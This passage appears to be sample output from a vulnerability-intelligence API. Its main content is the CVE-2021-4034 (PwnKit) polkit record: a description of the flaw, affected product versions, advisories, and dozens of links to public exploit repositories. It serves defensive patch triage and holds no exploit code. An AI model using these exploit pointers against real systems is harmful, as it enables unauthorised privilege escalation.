"cpe:2.3:a:atlassian:confluence_server:8.1.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.1.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.3:*:*:*:*:*:*:*"
],
"_timestamp": "2025-08-26T00:22:25.386422501Z"
}
]
IP Intelligence
IP Intelligence data on potentially vulnerable systems, attacker command & control infrastructure (C2), honeypots, proxies, and more.
- C2, webshells, open directories, implant detection, etc.
- 3 days (what's live right now), 10 days, 30 days, & 90 days
- For our Government partners, instead of just reporting we found implanted devices, we report how we detected the implants
GET /v3/index/ipintel-3d?id=initial-access&country=Kenya
{
"index": "vulnerabilities",
"id_type": "cve",
"id": "CVE-2021-4034",
"request_time": 1668561961,
"results_count": 1,
"results": [
{
"cve": {
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": {
"ID": "CVE-2021-4034",
"ASSIGNER": "secalert@redhat.com",
"ALIAS": "PwnKit",
"STATUS": "Confirmed"
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-787",
"name": "Out-of-bounds Write",
"url": "https://cwe.mitre.org/data/definitions/787.html"
}
]
}
]
},
"references": {
"reference_data": [
{
"url": "https://packetstormsecurity.com/files/166196/Polkit-pkexec-Local-Privilege-Escalation.html",
"name": "Polkit pkexec Local Privilege Escalation",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-03-03"
},
{
"url": "https://github.com/fdellwing/CVE-2021-4034",
"name": "fdellwing/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/chenaotian/CVE-2021-4034",
"name": "chenaotian/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/navisec/CVE-2021-4034-PwnKit",
"name": "navisec/CVE-2021-4034-PwnKit exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-30"
},
{
"url": "https://github.com/v-rzh/CVE-2021-4034",
"name": "v-rzh/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-29"
},
{
"url": "https://github.com/Pixailz/CVE-2021-4034",
"name": "Pixailz/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-10-10"
},
{
"url": "https://github.com/zhzyker/CVE-2021-4034",
"name": "zhzyker/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://gitlab.com/RekGRpth/CVE-2021-4034",
"name": "RekGRpth/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-03-03"
},
{
"url": "https://github.com/rapid7/metasploit-framework",
"name": "Local Privilege Escalation in polkits pkexec",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/linux_pkexec_argc",
"name": "linux_pkexec_argc",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-05-01"
},
{
"url": "https://github.com/ck00004/CVE-2021-4034",
"name": "ck00004/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-02-15"
},
{
"url": "https://github.com/robemmerson/CVE-2021-4034",
"name": "robemmerson/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/joeammond/CVE-2021-4034",
"name": "joeammond/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/ayypril/CVE-2021-4034",
"name": "ayypril/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/clubby789/CVE-2021-4034",
"name": "clubby789/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/HrishitJoshi/CVE-2021-4034",
"name": "HrishitJoshi/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-02-02"
},
{
"url": "https://packetstormsecurity.com/files/165729/Polkit-pkexec-CVE-2021-4034-Local-Root.html",
"name": "Polkit pkexec CVE-2021-4034 Local Root",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://packetstormsecurity.com/files/165727/Polkit-pkexec-CVE-2021-4034-Local-Root.html",
"name": "Polkit pkexec CVE-2021-4034 Local Root",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/dadvlingd/-CVE-2021-4034",
"name": "dadvlingd/-CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/signfind/CVE-2021-4034",
"name": "signfind/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "0001-01-01"
},
{
"url": "https://github.com/dzonerzy/poc-cve-2021-4034",
"name": "dzonerzy/poc-cve-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/arthepsy/CVE-2021-4034",
"name": "arthepsy/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/ly4k/PwnKit",
"name": "ly4k/PwnKit exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/Ankit-Ojha16/CVE-2021-4034",
"name": "Ankit-Ojha16/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-02-02"
},
{
"url": "https://github.com/mtthwstffrd/berdav-CVE-2021-4034",
"name": "mtthwstffrd/berdav-CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-03-23"
},
{
"url": "https://packetstormsecurity.com/files/165739/PolicyKit-1-0.105-31-Privilege-Escalation.html",
"name": "PolicyKit-1 0.105-31 Privilege Escalation",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-27"
},
{
"url": "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json",
"name": "Red Hat Polkit Out-of-Bounds Read and Write Vulnerability",
"refsource": "CISA-KNOWN-EXPLOITED-VULNERABILITIES",
"tags": [
"US Government Resource",
"Third Party Advisory"
],
"date_added": "2022-06-27"
},
{
"url": "https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html",
"name": "Alchimist: A new attack framework in Chinese for Mac, Linux and Windows",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-10-13"
},
{
"url": "https://github.com/phvilasboas/CVE-2021-4034",
"name": "phvilasboas/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/Ayrx/CVE-2021-4034",
"name": "Ayrx/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/berdav/CVE-2021-4034",
"name": "berdav/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-25"
},
{
"url": "https://github.com/An00bRektn/CVE-2021-4034",
"name": "An00bRektn/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/EstamelGG/CVE-2021-4034-NoGCC",
"name": "EstamelGG/CVE-2021-4034-NoGCC exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-28"
},
{
"url": "https://github.com/Al1ex/CVE-2021-4034",
"name": "Al1ex/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-27"
},
{
"url": "https://gitlab.com/Tramadol/cve-2021-4034",
"name": "Tramadol/cve-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/x04000/CVE-2021-4034",
"name": "x04000/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-02-13"
},
{
"url": "https://packetstormsecurity.com/files/165728/Polkit-pkexec-CVE-2021-4034-Proof-Of-Concept.html",
"name": "Polkit pkexec CVE-2021-4034 Proof Of Concept",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://my.saintcorporation.com/cgi-bin/exploit_info/polkit_pkexec_priv_elev",
"name": "Polkit pkexec privilege elevation",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-27"
},
{
"url": "https://packetstormsecurity.com/files/166200/Polkit-pkexec-Privilege-Escalation.html",
"name": "Polkit pkexec Privilege Escalation",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-03-04"
},
{
"url": "https://github.com/Rvn0xsy/CVE-2021-4034",
"name": "Rvn0xsy/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-28"
},
{
"url": "https://github.com/CYB3RK1D/CVE-2021-4034-POC",
"name": "CYB3RK1D/CVE-2021-4034-POC exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-28"
},
{
"url": "https://github.com/OxWeb4/CVE-2021-4034-",
"name": "OxWeb4/CVE-2021-4034- exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-29"
},
{
"url": "https://github.com/nikaiw/CVE-2021-4034",
"name": "nikaiw/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/n3onhacks/CVE-2021-4034",
"name": "n3onhacks/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-28"
},
{
"url": "https://github.com/luijait/PwnKit-Exploit",
"name": "luijait/PwnKit-Exploit exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/san3ncrypt3d/CVE-2021-4034-POC",
"name": "san3ncrypt3d/CVE-2021-4034-POC exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/ryaagard/CVE-2021-4034",
"name": "ryaagard/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-25"
},
{
"url": "https://github.com/artemis-mike/cve-2021-4034",
"name": "artemis-mike/cve-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/Hifumi1337/CVE-2021-4034",
"name": "Hifumi1337/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-03-16"
},
{
"url": "https://github.com/PwnFunction/CVE-2021-4034",
"name": "PwnFunction/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-27"
},
{
"url": "https://www.gehealthcare.com/en-US/security",
"status": "active",
"lang": "en",
"name": "PwnKit – Critical Polkit Vulnerability in Linux Distributions (CVE-2021-4034)",
"refsource": "GE-HEALTHCARE",
"tags": [
"IoMT",
"Vendor Advisory"
],
"date_added": "2022-02-04"
},
{
"url": "https://www.cisa.gov/uscert/ics/advisories/ICSA-22-167-16",
"status": "active",
"lang": "en",
"name": "Siemens SCALANCE LPE 4903 and SINUMERIK Edge",
"external_id": "ICSA-22-167-16",
"refsource": "ICS-CERT",
"tags": [
"ICS/OT"
],
"date_added": "2022-06-16"
},
{
"url": "https://ubuntu.com/security/CVE-2021-4034",
"status": "active",
"lang": "en",
"name": "Ubuntu security advisory for CVE-2021-4034",
"external_id": "USN-5252-1",
"refsource": "UBUNTU-CVE-TRACKER",
"tags": [
"Vendor Advisory"
],
"date_added": "2022-01-28"
},
{
"url": "https://ubuntu.com/security/CVE-2021-4034",
"status": "active",
"lang": "en",
"name": "Ubuntu security advisory for CVE-2021-4034",
"external_id": "USN-5252-2",
"refsource": "UBUNTU-CVE-TRACKER",
"tags": [
"Vendor Advisory"
],
"date_added": "2022-01-28"
},
{
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-167-16",
"status": "active",
"lang": "en",
"name": "Siemens SCALANCE LPE 4903 and SINUMERIK Edge",
"external_id": "icsa-22-167-16",
"refsource": "ICS-CERT",
"tags": [
"ICS/OT"
],
"date_added": "2022-06-16"
},
{
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-330556.pdf",
"status": "active",
"lang": "en",
"name": "PwnKit Vulnerability in SCALANCE LPE9403 and SINUMERIK Edge Products (CVE-2021-4034)",
"external_id": "SSA-330556",
"refsource": "SIEMENS",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-06-14"
},
{
"url": "https://www.debian.org/security/2022/dsa-5059",
"status": "active",
"lang": "en",
"name": "DSA-5059-1 policykit-1 -- security update",
"external_id": "DSA-5059",
"refsource": "DEBIAN-DSA",
"tags": [
"Vendor Advisory"
],
"date_added": "2022-01-25"
},
{
"url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001254&LanguageCode=en&DocumentPartId=&Action=Launch",
"status": "active",
"lang": "en",
"name": "",
"refsource": "ABB",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-04-11"
},
{
"url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001254&LanguageCode=en&DocumentPartId=&Action=Launch",
"status": "active",
"lang": "en",
"name": "",
"refsource": "ABB",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-04-11"
},
{
"url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001254&LanguageCode=en&Action=Launch",
"status": "active",
"lang": "en",
"name": "",
"refsource": "ABB",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-04-11"
},
{
"url": "https://www.cisa.gov/uscert/ics/advisories/ICSA-22-270-02",
"status": "active",
"lang": "en",
"name": "Hitachi Energy APM Edge",
"external_id": "ICSA-22-270-02",
"refsource": "ICS-CERT",
"tags": [
"ICS/OT"
],
"date_added": "2022-09-27"
},
{
"url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001254&LanguageCode=en&Action=Launch",
"status": "active",
"lang": "en",
"name": "",
"refsource": "ABB",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-04-11"
},
{
"url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001254&LanguageCode=en&Action=Launch&_ga=2.56758504.353589356.1650867075-372504397.1647012599",
"status": "active",
"lang": "en",
"name": "",
"refsource": "ABB",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-04-11"
},
{
"url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
"name": "CVE-2021-4034 exploited by DriftingCloud threat actor",
"refsource": "MISC",
"tags": []
},
{
"url": "https://www.trendmicro.com/en_us/research/22/e/patch-your-wso2-cve-2022-29464-exploited-to-install-linux-compatible-cobalt-strike-beacons-other-malware.html",
"name": "CVE-2021-4034 associated with Hezb botnet",
"refsource": "MISC",
"tags": []
},
{
"url": "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/",
"name": "CVE-2021-4034 associated with Hezb botnet",
"refsource": "MISC",
"tags": []
},
{
"url": "https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations",
"name": "CVE-2021-4034 associated with Hezb botnet",
"refsource": "MISC",
"tags": []
},
{
"url": "https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt",
"name": "https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt",
"refsource": "MISC",
"tags": [
"Exploit",
"Mitigation",
"Third Party Advisory"
]
},
{
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2022-001",
"name": "https://access.redhat.com/security/vulnerabilities/RHSB-2022-001",
"refsource": "MISC",
"tags": [
"Mitigation",
"Vendor Advisory"
]
},
{
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2025869",
"name": "https://bugzilla.redhat.com/show_bug.cgi?id=2025869",
"refsource": "MISC",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
]
},
{
"url": "https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683",
"name": "https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683",
"refsource": "MISC",
"tags": [
"Patch",
"Third Party Advisory"
]
},
{
"url": "https://www.suse.com/support/kb/doc/?id=000020564",
"name": "https://www.suse.com/support/kb/doc/?id=000020564",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"name": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://www.starwindsoftware.com/security/sw-20220818-0001/",
"name": "https://www.starwindsoftware.com/security/sw-20220818-0001/",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
]
}
]
},
"categorization": {
"tags": [
"ICS/OT",
"IoMT",
"Operating System",
"IoT"
]
},
"description": {
"description_data": [
{
"lang": "en",
"value": "A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine."
}
]
}
},
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:polkit_project:polkit:*:*:*:*:*:*:*:*",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_scientific_computing:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.1:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.7:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.6:*:*:*:*:*:*:*",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:21.10:*:*:*:*:*:*:*",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:suse:manager_server:4.1:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:sp5:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:15:sp2:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:suse:enterprise_storage:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:suse:manager_proxy:4.1:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:suse:linux_enterprise_high_performance_computing:15.0:sp2:*:*:-:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:15:sp2:*:*:*:-:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:15:sp2:*:*:*:sap:*:*",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:oracle:http_server:12.2.1.3.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:oracle:http_server:12.2.1.4.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:siemens:sinumerik_edge:*:*:*:*:*:*:*:*",
"versionEndExcluding": "3.3.0",
"cpe_name": []
}
]
},
{
"operator": "AND",
"children": [
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:siemens:scalance_lpe9403_firmware:*:*:*:*:*:*:*:*",
"versionEndExcluding": "2.0",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": false,
"cpe23Uri": "cpe:2.3:h:siemens:scalance_lpe9403:-:*:*:*:*:*:*:*",
"cpe_name": []
}
]
}
],
"cpe_match": []
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:starwindsoftware:starwind_virtual_san:v8:build14338:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:starwindsoftware:starwind_hyperconverged_appliance:-:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:starwindsoftware:command_center:1.0:update3_build5871:*:*:*:*:*:*",
"cpe_name": []
}
]
}
]
},
"vulnerable_cpes": [
"cpe:2.3:a:oracle:http_server:12.2.1.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:oracle:http_server:12.2.1.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*",
